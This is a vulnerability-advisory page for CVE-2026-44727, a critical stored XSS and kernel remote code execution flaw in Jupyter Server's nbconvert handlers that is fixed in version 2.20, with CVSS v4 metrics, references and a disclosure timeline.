Stored XSS and Remote Code Execution in Jupyter Server
CVE-2026-44727

9.3CRITICAL

Key Information:

Vendor: Jupyter-server
Status: Jupyter Server
Vendor: CVE Published:; 22 June 2026

🔔 Create Jupyter-server Vulnerability Alert

What is CVE-2026-44727?

Jupyter Server's handling of user-authored notebook HTML prior to version 2.20 in its nbconvert HTTP handlers poses significant security risks. The absence of a proper sandbox directive within the Content-Security-Policy coupled with nbconvert.HTMLExporter's default non-sanitizing behavior enables an attacker to exploit notebooks containing malicious HTML payloads. This exploitation can lead to stored XSS, allowing unauthorized access to cookies and full authority over API endpoints, as well as the potential for kernel remote code execution. The vulnerability has been addressed in version 2.20, mitigating these risks.

Affected Version(s)

jupyter_server < 2.20

References

https://github.com/jupyter-server/jupyter_server/security...

x_refsource_CONFIRM

https://github.com/jupyter-server/jupyter_server/commit/6...

x_refsource_MISC

CVSS V4

Score:

9.3

Severity:

CRITICAL

Confidentiality:

High

Integrity:

High

Availability:

High

Attack Vector:

Network

Attack Complexity:

Low

Attack Required:

None

Privileges Required:

Undefined

User Interaction:

Unknown

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
Jun 22, 2026
Vulnerability Reserved
May 7, 2026

CVE-2026-44727 Data

JSON